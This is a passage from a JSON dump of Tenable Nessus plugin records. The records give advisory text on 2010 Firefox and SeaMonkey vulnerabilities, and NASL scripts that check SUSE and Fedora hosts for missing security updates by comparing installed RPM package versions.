Content-Type: application/octet-stream is embedded into\n another document via an tag with type='image/svg+xml',\n the Content-Type is ignored and the SVG document is\n processed normally. A website which allows arbitrary\n binary data to be uploaded but which relies on\n Content-Type: application/octet-stream to prevent script\n execution could have such protection bypassed. An\n attacker could upload a SVG document containing\n JavaScript as a binary file to a website, embed the SVG\n document into a malicous page on another site, and gain\n access to the script environment from the SVG-serving\n site, bypassing the same-origin policy. (MFSA 2010-05 /\n CVE-2010-0162)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-01.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-03.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-04.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-05.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1571.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3988.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0159.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0160.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0162.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6867.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(79, 94, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"MozillaFirefox-3.5.8-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"MozillaFirefox-translations-3.5.8-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"mozilla-xulrunner191-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"mozilla-xulrunner191-translations-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-32bit-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"MozillaFirefox-3.5.8-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"MozillaFirefox-translations-3.5.8-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"mozilla-xulrunner191-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"mozilla-xulrunner191-translations-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.8-1.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-32bit-1.9.1.8-1.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:54:47", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=576969"], "pluginID": "44903", "description": "Mozilla Firefox was upgraded to version 3.5.8, fixing various bugs and security issues.\n\nFollowing security issues have been fixed: MFSA 2010-01 / CVE-2010-0159: Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code.\n\nMFSA 2010-02 / CVE-2010-0160: Security researcher Orlando Barrera II reported via TippingPoint's Zero Day Initiative that Mozilla's implementation of Web Workers contained an error in its handling of array data types when processing posted messages. This error could be used by an attacker to corrupt heap memory and crash the browser, potentially running arbitrary code on a victim's computer.\n\nMFSA 2010-03 / CVE-2009-1571: Security researcher Alin Rad Pop of Secunia Research reported that the HTML parser incorrectly freed used memory when insufficient space was available to process remaining input. Under such circumstances, memory occupied by in-use objects was freed and could later be filled with attacker-controlled text. These conditions could result in the execution or arbitrary code if methods on the freed objects were subsequently called.\n\nMFSA 2010-04 / CVE-2009-3988: Security researcher Hidetake Jo of Microsoft Vulnerability Research reported that the properties set on an object passed to showModalDialog were readable by the document contained in the dialog, even when the document was from a different domain. This is a violation of the same-origin policy and could result in a website running untrusted JavaScript if it assumed the dialogArguments could not be initialized by another site.\n\nAn anonymous security researcher, via TippingPoint's Zero Day Initiative, also independently reported this issue to Mozilla.\n\nMFSA 2010-05 / CVE-2010-0162: Mozilla security researcher Georgi Guninski reported that when a SVG document which is served with Content-Type: application/octet-stream is embedded into another document via an <embed> tag with type='image/svg+xml', the Content-Type is ignored and the SVG document is processed normally. A website which allows arbitrary binary data to be uploaded but which relies on Content-Type: application/octet-stream to prevent script execution could have such protection bypassed. An attacker could upload a SVG document containing JavaScript as a binary file to a website, embed the SVG document into a malicous page on another site, and gain access to the script environment from the SVG-serving site, bypassing the same-origin policy.", "edition": 5, "reporter": "Tenable", "published": "2010-02-25T00:00:00", "title": "openSUSE Security Update : MozillaFirefox (MozillaFirefox-2017)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2016-12-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mozilla-xulrunner191-32bit", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common", "p-cpe:/a:novell:opensuse:mozilla-xulrunner191-gnomevfs", "p-cpe:/a:novell:opensuse:mozilla-xulrunner191", "p-cpe:/a:novell:opensuse:mozilla-xulrunner191-gnomevfs-32bit", "p-cpe:/a:novell:opensuse:mozilla-xulrunner191-devel", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:python-xpcom191", "p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream", "p-cpe:/a:novell:opensuse:mozilla-xulrunner191-translations-other", "p-cpe:/a:novell:opensuse:mozilla-xulrunner191-translations-common", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other", "p-cpe:/a:novell:opensuse:MozillaFirefox", "p-cpe:/a:novell:opensuse:mozilla-xulrunner191-kde4"], "id": "SUSE_11_2_MOZILLAFIREFOX-100218.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44903", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update MozillaFirefox-2017.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44903);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:19 $\");\n\n script_cve_id(\"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\");\n\n script_name(english:\"openSUSE Security Update : MozillaFirefox (MozillaFirefox-2017)\");\n script_summary(english:\"Check for the MozillaFirefox-2017 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox was upgraded to version 3.5.8, fixing various bugs and\nsecurity issues.\n\nFollowing security issues have been fixed: MFSA 2010-01 /\nCVE-2010-0159: Mozilla developers identified and fixed several\nstability bugs in the browser engine used in Firefox and other\nMozilla-based products. Some of these crashes showed evidence of\nmemory corruption under certain circumstances and we presume that with\nenough effort at least some of these could be exploited to run\narbitrary code.\n\nMFSA 2010-02 / CVE-2010-0160: Security researcher Orlando Barrera II\nreported via TippingPoint's Zero Day Initiative that Mozilla's\nimplementation of Web Workers contained an error in its handling of\narray data types when processing posted messages. This error could be\nused by an attacker to corrupt heap memory and crash the browser,\npotentially running arbitrary code on a victim's computer.\n\nMFSA 2010-03 / CVE-2009-1571: Security researcher Alin Rad Pop of\nSecunia Research reported that the HTML parser incorrectly freed used\nmemory when insufficient space was available to process remaining\ninput. Under such circumstances, memory occupied by in-use objects was\nfreed and could later be filled with attacker-controlled text. These\nconditions could result in the execution or arbitrary code if methods\non the freed objects were subsequently called.\n\nMFSA 2010-04 / CVE-2009-3988: Security researcher Hidetake Jo of\nMicrosoft Vulnerability Research reported that the properties set on\nan object passed to showModalDialog were readable by the document\ncontained in the dialog, even when the document was from a different\ndomain. This is a violation of the same-origin policy and could result\nin a website running untrusted JavaScript if it assumed the\ndialogArguments could not be initialized by another site.\n\nAn anonymous security researcher, via TippingPoint's Zero Day\nInitiative, also independently reported this issue to Mozilla.\n\nMFSA 2010-05 / CVE-2010-0162: Mozilla security researcher Georgi\nGuninski reported that when a SVG document which is served with\nContent-Type: application/octet-stream is embedded into another\ndocument via an <embed> tag with type='image/svg+xml', the\nContent-Type is ignored and the SVG document is processed normally. A\nwebsite which allows arbitrary binary data to be uploaded but which\nrelies on Content-Type: application/octet-stream to prevent script\nexecution could have such protection bypassed. An attacker could\nupload a SVG document containing JavaScript as a binary file to a\nwebsite, embed the SVG document into a malicous page on another site,\nand gain access to the script environment from the SVG-serving site,\nbypassing the same-origin policy.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=576969\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MozillaFirefox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(79, 94, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner191\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner191-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner191-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner191-gnomevfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner191-gnomevfs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner191-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner191-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner191-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-xpcom191\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"MozillaFirefox-3.5.8-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"MozillaFirefox-branding-upstream-3.5.8-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"MozillaFirefox-translations-common-3.5.8-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"MozillaFirefox-translations-other-3.5.8-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mozilla-xulrunner191-1.9.1.8-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mozilla-xulrunner191-devel-1.9.1.8-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.8-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mozilla-xulrunner191-kde4-0.6-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mozilla-xulrunner191-translations-common-1.9.1.8-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mozilla-xulrunner191-translations-other-1.9.1.8-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"python-xpcom191-1.9.1.8-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.8-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.8-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:54:12", "references": ["http://www.nessus.org/u?b0b49cef", "http://www.mozilla.org/security/known-", "https://bugzilla.redhat.com/show_bug.cgi?id=566047", "https://bugzilla.redhat.com/show_bug.cgi?id=566049", "https://bugzilla.redhat.com/show_bug.cgi?id=566050", "https://bugzilla.redhat.com/show_bug.cgi?id=566052", "https://bugzilla.redhat.com/show_bug.cgi?id=566051"], "pluginID": "47285", "description": "Update to new upstream SeaMonkey version 2.0.3, fixing multiple security issues detailed in the upstream advisories:\nhttp://www.mozilla.org/security/known- vulnerabilities/seamonkey20.html#seamonkey2.0.3\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 6, "reporter": "Tenable", "published": "2010-07-01T00:00:00", "title": "Fedora 12 : seamonkey-2.0.3-1.fc12 (2010-1932)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2018-07-12T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:12", "p-cpe:/a:fedoraproject:fedora:seamonkey"], "id": "FEDORA_2010-1932.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=47285", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-1932.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(47285);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/07/12 15:01:52\");\n\n script_cve_id(\"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\");\n script_xref(name:\"FEDORA\", value:\"2010-1932\");\n\n script_name(english:\"Fedora 12 : seamonkey-2.0.3-1.fc12 (2010-1932)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to new upstream SeaMonkey version 2.0.3, fixing multiple\nsecurity issues detailed in the upstream advisories:\nhttp://www.mozilla.org/security/known-\nvulnerabilities/seamonkey20.html#seamonkey2.0.3\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/known-\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=566047\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=566049\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=566050\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=566051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=566052\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-February/035346.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b0b49cef\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected seamonkey package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(79, 94, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", reference:\"seamonkey-2.0.3-1.fc12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"seamonkey\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:09:25", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=576969"], "pluginID": "44901", "description": "Mozilla Firefox was upgraded to version 3.0.18, fixing various bugs and security issues.\n\nFollowing security issues have been fixed: MFSA 2010-01 / CVE-2010-0159: Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code.\n\nMFSA 2010-02 / CVE-2010-0160: Security researcher Orlando Barrera II reported via TippingPoint's Zero Day Initiative that Mozilla's implementation of Web Workers contained an error in its handling of array data types when processing posted messages. This error could be used by an attacker to corrupt heap memory and crash the browser, potentially running arbitrary code on a victim's computer.\n\nMFSA 2010-03 / CVE-2009-1571: Security researcher Alin Rad Pop of Secunia Research reported that the HTML parser incorrectly freed used memory when insufficient space was available to process remaining input. Under such circumstances, memory occupied by in-use objects was freed and could later be filled with attacker-controlled text. These conditions could result in the execution or arbitrary code if methods on the freed objects were subsequently called.\n\nMFSA 2010-04 / CVE-2009-3988: Security researcher Hidetake Jo of Microsoft Vulnerability Research reported that the properties set on an object passed to showModalDialog were readable by the document contained in the dialog, even when the document was from a different domain. This is a violation of the same-origin policy and could result in a website running untrusted JavaScript if it assumed the dialogArguments could not be initialized by another site.\n\nAn anonymous security researcher, via TippingPoint's Zero Day Initiative, also independently reported this issue to Mozilla.\n\nMFSA 2010-05 / CVE-2010-0162: Mozilla security researcher Georgi Guninski reported that when a SVG document which is served with Content-Type: application/octet-stream is embedded into another document via an <embed> tag with type='image/svg+xml', the Content-Type is ignored and the SVG document is processed normally. A website which allows arbitrary binary data to be uploaded but which relies on Content-Type: application/octet-stream to prevent script execution could have such protection bypassed. An attacker could upload a SVG document containing JavaScript as a binary file to a website, embed the SVG document into a malicous page on another site, and gain access to the script environment from the SVG-serving site, bypassing the same-origin policy.", "edition": 5, "reporter": "Tenable", "published": "2010-02-25T00:00:00", "title": "openSUSE Security Update : MozillaFirefox (MozillaFirefox-2052)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2016-12-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mozilla-xulrunner190-gnomevfs-32bit", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations", "p-cpe:/a:novell:opensuse:python-xpcom190", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:mozilla-xulrunner190-32bit", "p-cpe:/a:novell:opensuse:mozilla-xulrunner190-translations-32bit", "p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream", "p-cpe:/a:novell:opensuse:mozilla-xulrunner190-devel", "p-cpe:/a:novell:opensuse:mozilla-xulrunner190-translations", "p-cpe:/a:novell:opensuse:MozillaFirefox", "p-cpe:/a:novell:opensuse:mozilla-xulrunner190", "p-cpe:/a:novell:opensuse:mozilla-xulrunner190-gnomevfs"], "id": "SUSE_11_1_MOZILLAFIREFOX-100223.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44901", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update MozillaFirefox-2052.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44901);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:18 $\");\n\n script_cve_id(\"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\");\n\n script_name(english:\"openSUSE Security Update : MozillaFirefox (MozillaFirefox-2052)\");\n script_summary(english:\"Check for the MozillaFirefox-2052 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox was upgraded to version 3.0.18, fixing various bugs\nand security issues.\n\nFollowing security issues have been fixed: MFSA 2010-01 /\nCVE-2010-0159: Mozilla developers identified and fixed several\nstability bugs in the browser engine used in Firefox and other\nMozilla-based products. Some of these crashes showed evidence of\nmemory corruption under certain circumstances and we presume that with\nenough effort at least some of these could be exploited to run\narbitrary code.\n\nMFSA 2010-02 / CVE-2010-0160: Security researcher Orlando Barrera II\nreported via TippingPoint's Zero Day Initiative that Mozilla's\nimplementation of Web Workers contained an error in its handling of\narray data types when processing posted messages. This error could be\nused by an attacker to corrupt heap memory and crash the browser,\npotentially running arbitrary code on a victim's computer.\n\nMFSA 2010-03 / CVE-2009-1571: Security researcher Alin Rad Pop of\nSecunia Research reported that the HTML parser incorrectly freed used\nmemory when insufficient space was available to process remaining\ninput. Under such circumstances, memory occupied by in-use objects was\nfreed and could later be filled with attacker-controlled text. These\nconditions could result in the execution or arbitrary code if methods\non the freed objects were subsequently called.\n\nMFSA 2010-04 / CVE-2009-3988: Security researcher Hidetake Jo of\nMicrosoft Vulnerability Research reported that the properties set on\nan object passed to showModalDialog were readable by the document\ncontained in the dialog, even when the document was from a different\ndomain. This is a violation of the same-origin policy and could result\nin a website running untrusted JavaScript if it assumed the\ndialogArguments could not be initialized by another site.\n\nAn anonymous security researcher, via TippingPoint's Zero Day\nInitiative, also independently reported this issue to Mozilla.\n\nMFSA 2010-05 / CVE-2010-0162: Mozilla security researcher Georgi\nGuninski reported that when a SVG document which is served with\nContent-Type: application/octet-stream is embedded into another\ndocument via an <embed> tag with type='image/svg+xml', the\nContent-Type is ignored and the SVG document is processed normally. A\nwebsite which allows arbitrary binary data to be uploaded but which\nrelies on Content-Type: application/octet-stream to 